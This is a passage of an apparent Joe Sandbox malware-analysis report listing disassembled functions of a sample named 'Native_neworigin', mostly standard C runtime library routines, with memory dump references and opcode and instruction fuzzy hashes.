                                                                                                                                                                                                                                                                                                                                  • ___convertcp.LIBCMT ref: 004173BA
                                                                                                                                                                                                                                                                                                                                  • __freea.LIBCMT ref: 004173CF
                                                                                                                                                                                                                                                                                                                                  • LCMapStringA.KERNEL32(?,?,?,?,7FFFFFFF,00000100,7FFFFFFF,00000100,7FFFFFFF,?,?,?,?,7FFFFFFF,?,00000000), ref: 004173E9
                                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                                  • Source File: 00000009.00000002.2396597881.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.2396561892.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.2396630294.000000000041B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.2396656156.0000000000422000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.2396683576.0000000000426000.00000040.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.2396683576.000000000044C000.00000040.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.2396798482.000000000055F000.00000040.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_9_2_400000_Native_neworigin.jbxd
                                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                                  • API ID: String$ByteCharMultiWide__freea_malloc$___convertcp$ErrorLast___ansicp_memset
                                                                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                                                                  • API String ID: 3809854901-0
                                                                                                                                                                                                                                                                                                                                  • Opcode ID: 3d09e5343aa18fab3ca4e2e74db44cf1cccdb49efdd84c094ede33f31d65ba6e
                                                                                                                                                                                                                                                                                                                                  • Instruction ID: cdfffc9a1d2b3026f9ae82d5cc8d175594050d3ba9b5f3d3ede674b9b5b9b85c
                                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 3d09e5343aa18fab3ca4e2e74db44cf1cccdb49efdd84c094ede33f31d65ba6e
                                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 29B1B072908119EFCF119FA0CC808EF7BB5EF48354B14856BF915A2260D7398DD2DB98
                                                                                                                                                                                                                                                                                                                                  Function 008624FF Relevance: 19.6, APIs: 13, Instructions: 114COMMONLIBRARYCODE
                                                                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                                                  • ___free_lconv_mon.LIBCMT ref: 00862543
                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 00863073: _free.LIBCMT ref: 00863090
                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 00863073: _free.LIBCMT ref: 008630A2
                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 00863073: _free.LIBCMT ref: 008630B4
                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 00863073: _free.LIBCMT ref: 008630C6
                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 00863073: _free.LIBCMT ref: 008630D8
                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 00863073: _free.LIBCMT ref: 008630EA
                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 00863073: _free.LIBCMT ref: 008630FC
                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 00863073: _free.LIBCMT ref: 0086310E
                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 00863073: _free.LIBCMT ref: 00863120
                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 00863073: _free.LIBCMT ref: 00863132
                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 00863073: _free.LIBCMT ref: 00863144
                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 00863073: _free.LIBCMT ref: 00863156
                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 00863073: _free.LIBCMT ref: 00863168
                                                                                                                                                                                                                                                                                                                                  • _free.LIBCMT ref: 00862538
                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 00862096: HeapFree.KERNEL32(00000000,00000000,?,00863208,?,00000000,?,00000000,?,0086322F,?,00000007,?,?,00862697,?), ref: 008620AC
                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 00862096: GetLastError.KERNEL32(?,?,00863208,?,00000000,?,00000000,?,0086322F,?,00000007,?,?,00862697,?,?), ref: 008620BE
                                                                                                                                                                                                                                                                                                                                  • _free.LIBCMT ref: 0086255A
                                                                                                                                                                                                                                                                                                                                  • _free.LIBCMT ref: 0086256F
                                                                                                                                                                                                                                                                                                                                  • _free.LIBCMT ref: 0086257A
                                                                                                                                                                                                                                                                                                                                  • _free.LIBCMT ref: 0086259C
                                                                                                                                                                                                                                                                                                                                  • _free.LIBCMT ref: 008625AF
                                                                                                                                                                                                                                                                                                                                  • _free.LIBCMT ref: 008625BD
                                                                                                                                                                                                                                                                                                                                  • _free.LIBCMT ref: 008625C8
                                                                                                                                                                                                                                                                                                                                  • _free.LIBCMT ref: 00862600
                                                                                                                                                                                                                                                                                                                                  • _free.LIBCMT ref: 00862607
                                                                                                                                                                                                                                                                                                                                  • _free.LIBCMT ref: 00862624
                                                                                                                                                                                                                                                                                                                                  • _free.LIBCMT ref: 0086263C
                                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                                  • Source File: 00000009.00000002.2396960520.0000000000820000.00000040.00001000.00020000.00000000.sdmp, Offset: 00820000, based on PE: false
                                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_9_2_820000_Native_neworigin.jbxd
                                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                                  • API ID: _free$ErrorFreeHeapLast___free_lconv_mon
                                                                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                                                                  • API String ID: 161543041-0
                                                                                                                                                                                                                                                                                                                                  • Opcode ID: 88a1f0fd727e3be598799670a57fc0f2ec0dcec3126062d7dd5f0723e33bc3e7
                                                                                                                                                                                                                                                                                                                                  • Instruction ID: cd231dd4c2690d1e20ca772d3aa7d5192439ca2ebc8c72d3f36b7795347bb40f
                                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 88a1f0fd727e3be598799670a57fc0f2ec0dcec3126062d7dd5f0723e33bc3e7
                                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 1C318D71A00F029FEB31AA78D809B56B3E8FF10311F1258A9E45AD71A1DF71ED80CB52
                                                                                                                                                                                                                                                                                                                                  Function 004057B0 Relevance: 12.5, APIs: 6, Strings: 1, Instructions: 205COMMON
                                                                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                                                  • _malloc.LIBCMT ref: 004057DE
                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 0040B84D: __FF_MSGBANNER.LIBCMT ref: 0040B870
                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 0040B84D: __NMSG_WRITE.LIBCMT ref: 0040B877
                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 0040B84D: RtlAllocateHeap.NTDLL(00000000,-0000000E,00000001,00000000,00000000,?,00411C86,00000001,00000001,00000001,?,0040D66A,00000018,00421240,0000000C,0040D6FB), ref: 0040B8C4
                                                                                                                                                                                                                                                                                                                                  • _malloc.LIBCMT ref: 00405842
                                                                                                                                                                                                                                                                                                                                  • _malloc.LIBCMT ref: 00405906
                                                                                                                                                                                                                                                                                                                                  • _malloc.LIBCMT ref: 00405930
                                                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                                  • Source File: 00000009.00000002.2396597881.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.2396561892.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.2396630294.000000000041B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.2396656156.0000000000422000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.2396683576.0000000000426000.00000040.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.2396683576.000000000044C000.00000040.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.2396798482.000000000055F000.00000040.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_9_2_400000_Native_neworigin.jbxd
                                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                                  • API ID: _malloc$AllocateHeap
                                                                                                                                                                                                                                                                                                                                  • String ID: 1.2.3
                                                                                                                                                                                                                                                                                                                                  • API String ID: 680241177-2310465506
                                                                                                                                                                                                                                                                                                                                  • Opcode ID: 1371ffb49ce3b8dee1113081a69af0fad64233f45308895947edc3c59a7df708
                                                                                                                                                                                                                                                                                                                                  • Instruction ID: 6f54ea0e5a0cddcbb7a6eab5c61130b8c10e9e343dc86a4c4a61a5a67c51a18e
                                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 1371ffb49ce3b8dee1113081a69af0fad64233f45308895947edc3c59a7df708
                                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 8B61F7B1944B408FD720AF2A888066BBBE0FB45314F548D3FE5D5A3781D739D8498F5A
                                                                                                                                                                                                                                                                                                                                  Function 0040BCC2 Relevance: 10.7, APIs: 7, Instructions: 189COMMONLIBRARYCODE
                                                                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                                  • Source File: 00000009.00000002.2396597881.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.2396561892.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.2396630294.000000000041B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.2396656156.0000000000422000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.2396683576.0000000000426000.00000040.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.2396683576.000000000044C000.00000040.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.2396798482.000000000055F000.00000040.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_9_2_400000_Native_neworigin.jbxd
                                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                                  • API ID: _memset$__filbuf__fileno__getptd_noexit__read_memcpy_s
                                                                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                                                                  • API String ID: 3886058894-0
                                                                                                                                                                                                                                                                                                                                  • Opcode ID: c8cdba87b669e5a45588b0eb276f39e335abb1b1e80ab099951c299220f7b7ba
                                                                                                                                                                                                                                                                                                                                  • Instruction ID: 0234425abcb0213f77efd30778ac7634d7a408156a07f93f58cd91f86a00e979
                                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: c8cdba87b669e5a45588b0eb276f39e335abb1b1e80ab099951c299220f7b7ba
                                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 1E519031A00605ABCB209F69C844A9FBB75EF41324F24863BF825B22D1D7799E51CBDD
                                                                                                                                                                                                                                                                                                                                  Function 00867B9C Relevance: 10.7, APIs: 7, Instructions: 152fileCOMMON
                                                                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                                                  • GetConsoleCP.KERNEL32(?,00000000,?,?,?,?,?,?,?,00868311,?,00000000,?,00000000,00000000), ref: 00867BDE
                                                                                                                                                                                                                                                                                                                                  • __fassign.LIBCMT ref: 00867C59
                                                                                                                                                                                                                                                                                                                                  • __fassign.LIBCMT ref: 00867C74
                                                                                                                                                                                                                                                                                                                                  • WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000001,?,00000005,00000000,00000000), ref: 00867C9A
                                                                                                                                                                                                                                                                                                                                  • WriteFile.KERNEL32(?,?,00000000,00868311,00000000,?,?,?,?,?,?,?,?,?,00868311,?), ref: 00867CB9
                                                                                                                                                                                                                                                                                                                                  • WriteFile.KERNEL32(?,?,00000001,00868311,00000000,?,?,?,?,?,?,?,?,?,00868311,?), ref: 00867CF2
                                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                                  • Source File: 00000009.00000002.2396960520.0000000000820000.00000040.00001000.00020000.00000000.sdmp, Offset: 00820000, based on PE: false
                                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_9_2_820000_Native_neworigin.jbxd
                                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                                  • API ID: FileWrite__fassign$ByteCharConsoleMultiWide
                                                                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                                                                  • API String ID: 1324828854-0
                                                                                                                                                                                                                                                                                                                                  • Opcode ID: b11964943c2d09e10d41188a0efc1be814fe6bd283203cbbcddac1930a97d792
                                                                                                                                                                                                                                                                                                                                  • Instruction ID: dea4ab4c838a6f66f3c68c6698c625f6f1054ef2f71743a65bc6f5120f6373c7
                                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: b11964943c2d09e10d41188a0efc1be814fe6bd283203cbbcddac1930a97d792
                                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 4951D3B0A042099FDB10CFA8DC85AEEBBF8FF09314F15455AE955E7291E730A941CFA1
                                                                                                                                                                                                                                                                                                                                  Function 00863216 Relevance: 10.6, APIs: 7, Instructions: 65COMMONLIBRARYCODE
                                                                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 008631DA: _free.LIBCMT ref: 00863203
                                                                                                                                                                                                                                                                                                                                  • _free.LIBCMT ref: 00863264
                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 00862096: HeapFree.KERNEL32(00000000,00000000,?,00863208,?,00000000,?,00000000,?,0086322F,?,00000007,?,?,00862697,?), ref: 008620AC
                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 00862096: GetLastError.KERNEL32(?,?,00863208,?,00000000,?,00000000,?,0086322F,?,00000007,?,?,00862697,?,?), ref: 008620BE
                                                                                                                                                                                                                                                                                                                                  • _free.LIBCMT ref: 0086326F
                                                                                                                                                                                                                                                                                                                                  • _free.LIBCMT ref: 0086327A
                                                                                                                                                                                                                                                                                                                                  • _free.LIBCMT ref: 008632CE
                                                                                                                                                                                                                                                                                                                                  • _free.LIBCMT ref: 008632D9
                                                                                                                                                                                                                                                                                                                                  • _free.LIBCMT ref: 008632E4
                                                                                                                                                                                                                                                                                                                                  • _free.LIBCMT ref: 008632EF
                                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                                  • Source File: 00000009.00000002.2396960520.0000000000820000.00000040.00001000.00020000.00000000.sdmp, Offset: 00820000, based on PE: false
                                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_9_2_820000_Native_neworigin.jbxd
                                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                                  • API ID: _free$ErrorFreeHeapLast
                                                                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                                                                  • API String ID: 776569668-0
                                                                                                                                                                                                                                                                                                                                  • Opcode ID: fcd263e1e97f9626aa0bdc167c26919d6134e182e28646451650430cd4015995
                                                                                                                                                                                                                                                                                                                                  • Instruction ID: dc03894d800f27ef7f734f4b4aca22fb3394c9b571302ed2028ae92fd44c9b5a
                                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: fcd263e1e97f9626aa0bdc167c26919d6134e182e28646451650430cd4015995
                                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: D011EC72A40F04AAD630FBB8CC47FCB779DFF06701F424815BA9EE6152DA65B6048693
                                                                                                                                                                                                                                                                                                                                  Function 0040C73D Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 64COMMON
                                                                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                                                  • __lock_file.LIBCMT ref: 0040C6C8
                                                                                                                                                                                                                                                                                                                                  • __fileno.LIBCMT ref: 0040C6D6
                                                                                                                                                                                                                                                                                                                                  • __fileno.LIBCMT ref: 0040C6E2
                                                                                                                                                                                                                                                                                                                                  • __fileno.LIBCMT ref: 0040C6EE
                                                                                                                                                                                                                                                                                                                                  • __fileno.LIBCMT ref: 0040C6FE
                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 0040BFC1: __getptd_noexit.LIBCMT ref: 0040BFC1
                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 0040E744: __decode_pointer.LIBCMT ref: 0040E74F
                                                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                                  • Source File: 00000009.00000002.2396597881.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.2396561892.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.2396630294.000000000041B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.2396656156.0000000000422000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.2396683576.0000000000426000.00000040.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.2396683576.000000000044C000.00000040.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.2396798482.000000000055F000.00000040.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_9_2_400000_Native_neworigin.jbxd
                                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                                  • API ID: __fileno$__decode_pointer__getptd_noexit__lock_file
                                                                                                                                                                                                                                                                                                                                  • String ID: 'B
                                                                                                                                                                                                                                                                                                                                  • API String ID: 2805327698-2787509829
                                                                                                                                                                                                                                                                                                                                  • Opcode ID: 2b0b2601706cdb465d4c9eff24f73974ea9fb0f2dbbf8fc2cbf9e4943b65d960
                                                                                                                                                                                                                                                                                                                                  • Instruction ID: db056c5abb1484b678344f3d998e50672bc49cccd6cfe868de5707b4f3f6250f
                                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 2b0b2601706cdb465d4c9eff24f73974ea9fb0f2dbbf8fc2cbf9e4943b65d960
                                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 1A01253231451096C261ABBE5CC246E76A0DE81734726877FF024BB1D2DB3C99429E9D
                                                                                                                                                                                                                                                                                                                                  Function 008644E9 Relevance: 9.2, APIs: 6, Instructions: 216COMMON
                                                                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                                                  • MultiByteToWideChar.KERNEL32(?,00000000,?,?,00000000,00000000,00000100,?,00000000,?,?,?,0086473A,?,?,00000000), ref: 00864543
                                                                                                                                                                                                                                                                                                                                  • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?,?,?,?,0086473A,?,?,00000000,?,?,?), ref: 008645C9
                                                                                                                                                                                                                                                                                                                                  • WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000000,00000000,?,00000000,00000000,?,00000400,00000000,?,00000000,00000000,00000000,00000000), ref: 008646C3
                                                                                                                                                                                                                                                                                                                                  • __freea.LIBCMT ref: 008646D0
                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 008632FA: RtlAllocateHeap.NTDLL(00000000,?,?), ref: 0086332C
                                                                                                                                                                                                                                                                                                                                  • __freea.LIBCMT ref: 008646D9
                                                                                                                                                                                                                                                                                                                                  • __freea.LIBCMT ref: 008646FE
                                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                                  • Source File: 00000009.00000002.2396960520.0000000000820000.00000040.00001000.00020000.00000000.sdmp, Offset: 00820000, based on PE: false
                                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_9_2_820000_Native_neworigin.jbxd
                                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                                  • API ID: ByteCharMultiWide__freea$AllocateHeap
                                                                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                                                                  • API String ID: 1414292761-0
                                                                                                                                                                                                                                                                                                                                  • Opcode ID: c7b5f4315d4cb780afe4946183a0d3f71ab9f1d93338b0898aa8c55e0d75498c
                                                                                                                                                                                                                                                                                                                                  • Instruction ID: 7ee2d7fa202181e2b5fb5030df26fe7475d49719813ea55c32cb4b1414e533e6
                                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: c7b5f4315d4cb780afe4946183a0d3f71ab9f1d93338b0898aa8c55e0d75498c
                                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: A8510172600206AFEB258F68CC45EAF77AAFB51750F176228FC05DB190EB74DC90C650
                                                                                                                                                                                                                                                                                                                                  Function 0086185B Relevance: 9.0, APIs: 6, Instructions: 50COMMONLIBRARYCODE
                                                                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                                  • Source File: 00000009.00000002.2396960520.0000000000820000.00000040.00001000.00020000.00000000.sdmp, Offset: 00820000, based on PE: false
                                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_9_2_820000_Native_neworigin.jbxd
                                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                                  • API ID: ErrorLast$_free$_abort
                                                                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                                                                  • API String ID: 3160817290-0
                                                                                                                                                                                                                                                                                                                                  • Opcode ID: 79b942cdb9bfeef5d847cce3047f490ec530179162e5ec23590ec3dcac29022f
                                                                                                                                                                                                                                                                                                                                  • Instruction ID: bff580f20b19d864b2262bd777b280c2f1ad5189f32d367d5e979ebbe9cc204f
                                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 79b942cdb9bfeef5d847cce3047f490ec530179162e5ec23590ec3dcac29022f
                                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 79F0A432500E016ADA16773D6C0EE2A2656FBC1761F2B4174F919E72A3FF658C428563
                                                                                                                                                                                                                                                                                                                                  Function 00863FC2 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 38libraryloaderCOMMONLIBRARYCODE
                                                                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                                                  • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,?,00863F73,00000003,?,00863F13,00000003,0087DE80,0000000C,0086403D,00000003,00000002), ref: 00863FE2
                                                                                                                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 00863FF5
                                                                                                                                                                                                                                                                                                                                  • FreeLibrary.KERNEL32(00000000,?,?,?,00863F73,00000003,?,00863F13,00000003,0087DE80,0000000C,0086403D,00000003,00000002,00000000), ref: 00864018
                                                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                                  • Source File: 00000009.00000002.2396960520.0000000000820000.00000040.00001000.00020000.00000000.sdmp, Offset: 00820000, based on PE: false
                                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_9_2_820000_Native_neworigin.jbxd
                                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                                  • API ID: AddressFreeHandleLibraryModuleProc
                                                                                                                                                                                                                                                                                                                                  • String ID: CorExitProcess$mscoree.dll
                                                                                                                                                                                                                                                                                                                                  • API String ID: 4061214504-1276376045
                                                                                                                                                                                                                                                                                                                                  • Opcode ID: b2a45690dd637ef4f3dff3d932bdb5defec0f59d3b59d7c8a7cf6a803e3316ec
                                                                                                                                                                                                                                                                                                                                  • Instruction ID: fa607a57d6410d673ad0d28dbf130da3e9c8fb34f5c2d6021ce2c2784631de00
                                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: b2a45690dd637ef4f3dff3d932bdb5defec0f59d3b59d7c8a7cf6a803e3316ec
                                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 7EF04430900628BBDB159F94DC09B9DBBB5FF04751F015064F805F2251DBB59E44CF92
                                                                                                                                                                                                                                                                                                                                  Function 00414738 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 31COMMONLIBRARYCODE
                                                                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                                                  • __getptd.LIBCMT ref: 00414744
                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 00410735: __getptd_noexit.LIBCMT ref: 00410738
                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 00410735: __amsg_exit.LIBCMT ref: 00410745
                                                                                                                                                                                                                                                                                                                                  • __getptd.LIBCMT ref: 0041475B
                                                                                                                                                                                                                                                                                                                                  • __amsg_exit.LIBCMT ref: 00414769
                                                                                                                                                                                                                                                                                                                                  • __lock.LIBCMT ref: 00414779
                                                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                                  • Source File: 00000009.00000002.2396597881.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.2396561892.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.2396630294.000000000041B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.2396656156.0000000000422000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.2396683576.0000000000426000.00000040.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.2396683576.000000000044C000.00000040.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.2396798482.000000000055F000.00000040.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_9_2_400000_Native_neworigin.jbxd
                                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                                  • API ID: __amsg_exit__getptd$__getptd_noexit__lock
                                                                                                                                                                                                                                                                                                                                  • String ID: @.B
                                                                                                                                                                                                                                                                                                                                  • API String ID: 3521780317-470711618
                                                                                                                                                                                                                                                                                                                                  • Opcode ID: f43c5434038c0e2b3130a40ea1e7b9b854db78837d0c16722a3a572f716d4dbb
                                                                                                                                                                                                                                                                                                                                  • Instruction ID: 91aff3cf2d6bbea4e2ea5d49e8e08bf0f41c3eb50374f8394f27d7b6c467aa53
